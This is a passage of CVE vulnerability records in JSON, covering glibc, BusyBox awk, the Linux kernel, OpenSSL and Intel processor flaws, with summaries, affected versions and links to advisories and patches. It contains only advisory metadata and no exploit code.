"[kafka-jira] 20210423 [jira] [Comment Edited] (KAFKA-12698) CVE-2019-25013 high priority vulnerability reported in Kafka", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2%40%3Cjira.kafka.apache.org%3E" }, { "name": "[zookeeper-issues] 20210506 [jira] [Resolved] (ZOOKEEPER-4285) High CVE-2019-25013 reported by Clair scanner for Zookeeper 3.6.1", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c%40%3Cissues.zookeeper.apache.org%3E" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "url": "https://security.netapp.com/advisory/ntap-20210205-0004/" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-25013", "datePublished": "2021-01-04T00:00:00", "dateReserved": "2021-01-04T00:00:00", "dateUpdated": "2024-08-05T03:00:18.826Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42386
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.449Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42386", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.449Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42384
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.277Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42384", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.277Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1882
Vulnerability from cvelistv5
Published
2022-05-26 00:00
Modified
2024-08-03 00:17
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in the Linux kernel’s pipes functionality in how a user performs manipulations with the pipe post_one_notification() after free_pipe_info() that is already called. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:17:00.907Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20220507115605.96775-1-tcs.kernel%40gmail.com/T/" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089701" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0002/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 5.18-rc8" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in the Linux kernel\u2019s pipes functionality in how a user performs manipulations with the pipe post_one_notification() after free_pipe_info() that is already called. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-07T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/20220507115605.96775-1-tcs.kernel%40gmail.com/T/" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089701" }, { "url": "https://security.netapp.com/advisory/ntap-20220715-0002/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-1882", "datePublished": "2022-05-26T00:00:00", "dateReserved": "2022-05-25T00:00:00", "dateUpdated": "2024-08-03T00:17:00.907Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-27618
Vulnerability from cvelistv5
Published
2021-02-26 00:00
Modified
2024-08-04 16:18
Severity ?
EPSS score ?
Summary
The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T16:18:45.458Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210401-0006/" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "url": "https://security.netapp.com/advisory/ntap-20210401-0006/" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-27618", "datePublished": "2021-02-26T00:00:00", "dateReserved": "2020-10-22T00:00:00", "dateUpdated": "2024-08-04T16:18:45.458Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0286
Vulnerability from cvelistv5
Published
2023-02-08 19:01
Modified
2024-08-02 05:02
Severity ?
EPSS score ?
Summary
There is a type confusion vulnerability relating to X.400 address processing
inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but
the public structure definition for GENERAL_NAME incorrectly specified the type
of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by
the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an
ASN1_STRING.
When CRL checking is enabled (i.e. the application sets the
X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass
arbitrary pointers to a memcmp call, enabling them to read memory contents or
enact a denial of service. In most cases, the attack requires the attacker to
provide both the certificate chain and CRL, neither of which need to have a
valid signature. If the attacker only controls one of these inputs, the other
input must already contain an X.400 address as a CRL distribution point, which
is uncommon. As such, this vulnerability is most likely to only affect
applications which have implemented their own functionality for retrieving CRLs
over a network.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:02:44.187Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "name": "3.0.8 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658" }, { "name": "1.1.1t git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9" }, { "name": "1.0.2zg patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d" }, { "tags": [ "x_transferred" ], "url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig" }, { "tags": [ "x_transferred" ], "url": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.0.8", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1t", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zg", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "David Benjamin (Google)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Hugo Landau" } ], "datePublic": "2023-02-07T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "There is a type confusion vulnerability relating to X.400 address processing\u003cbr\u003einside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but\u003cbr\u003ethe public structure definition for GENERAL_NAME incorrectly specified the type\u003cbr\u003eof the x400Address field as ASN1_TYPE. This field is subsequently interpreted by\u003cbr\u003ethe OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an\u003cbr\u003eASN1_STRING.\u003cbr\u003e\u003cbr\u003eWhen CRL checking is enabled (i.e. the application sets the\u003cbr\u003eX509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass\u003cbr\u003earbitrary pointers to a memcmp call, enabling them to read memory contents or\u003cbr\u003eenact a denial of service. In most cases, the attack requires the attacker to\u003cbr\u003eprovide both the certificate chain and CRL, neither of which need to have a\u003cbr\u003evalid signature. If the attacker only controls one of these inputs, the other\u003cbr\u003einput must already contain an X.400 address as a CRL distribution point, which\u003cbr\u003eis uncommon. As such, this vulnerability is most likely to only affect\u003cbr\u003eapplications which have implemented their own functionality for retrieving CRLs\u003cbr\u003eover a network.\u003cbr\u003e\u003cbr\u003e" } ], "value": "There is a type confusion vulnerability relating to X.400 address processing\ninside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but\nthe public structure definition for GENERAL_NAME incorrectly specified the type\nof the x400Address field as ASN1_TYPE. This field is subsequently interpreted by\nthe OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an\nASN1_STRING.\n\nWhen CRL checking is enabled (i.e. the application sets the\nX509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass\narbitrary pointers to a memcmp call, enabling them to read memory contents or\nenact a denial of service. In most cases, the attack requires the attacker to\nprovide both the certificate chain and CRL, neither of which need to have a\nvalid signature. If the attacker only controls one of these inputs, the other\ninput must already contain an X.400 address as a CRL distribution point, which\nis uncommon. As such, this vulnerability is most likely to only affect\napplications which have implemented their own functionality for retrieving CRLs\nover a network.\n\n" } ], "metrics": [ { "format": "other", "other": { "content": { "text": "High" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": " type confusion vulnerability", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-27T18:25:32.958867Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "name": "3.0.8 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658" }, { "name": "1.1.1t git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9" }, { "name": "1.0.2zg patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d" }, { "url": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig" }, { "url": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt" }, { "url": "https://security.gentoo.org/glsa/202402-08" } ], "source": { "discovery": "UNKNOWN" }, "title": "X.400 address type confusion in X.509 GeneralName", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-0286", "datePublished": "2023-02-08T19:01:50.514Z", "dateReserved": "2023-01-13T10:40:41.259Z", "dateUpdated": "2024-08-02T05:02:44.187Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-21125
Vulnerability from cvelistv5
Published
2022-06-15 20:01
Modified
2024-08-03 02:31
Severity ?
EPSS score ?
Summary
Incomplete cleanup of microarchitectural fill buffers on some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Intel(R) Processors |
Version: See references |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:31:58.736Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://xenbits.xen.org/xsa/advisory-404.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-23" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Intel(R) Processors", "vendor": "n/a", "versions": [ { "status": "affected", "version": "See references" } ] } ], "descriptions": [ { "lang": "en", "value": "Incomplete cleanup of microarchitectural fill buffers on some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ], "problemTypes": [ { "descriptions": [ { "description": " information disclosure ", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-14T20:08:18", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://xenbits.xen.org/xsa/advisory-404.html" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202208-23" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "secure@intel.com", "ID": "CVE-2022-21125", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Intel(R) Processors", "version": { "version_data": [ { "version_value": "See references" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Incomplete cleanup of microarchitectural fill buffers on some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": " information disclosure " } ] } ] }, "references": { "reference_data": [ { "name": "http://xenbits.xen.org/xsa/advisory-404.html", "refsource": "CONFIRM", "url": "http://xenbits.xen.org/xsa/advisory-404.html" }, { "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html", "refsource": "MISC", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "name": "https://security.netapp.com/advisory/ntap-20220624-0008/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202208-23" } ] } } } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2022-21125", "datePublished": "2022-06-15T20:01:10", "dateReserved": "2021-11-12T00:00:00", "dateUpdated": "2024-08-03T02:31:58.736Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-21233
Vulnerability from cvelistv5
Published
2022-08-18 00:00
Modified
2024-08-03 02:31
Severity ?
EPSS score ?
Summary
Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Intel(R) Processors |
Version: See references |
|
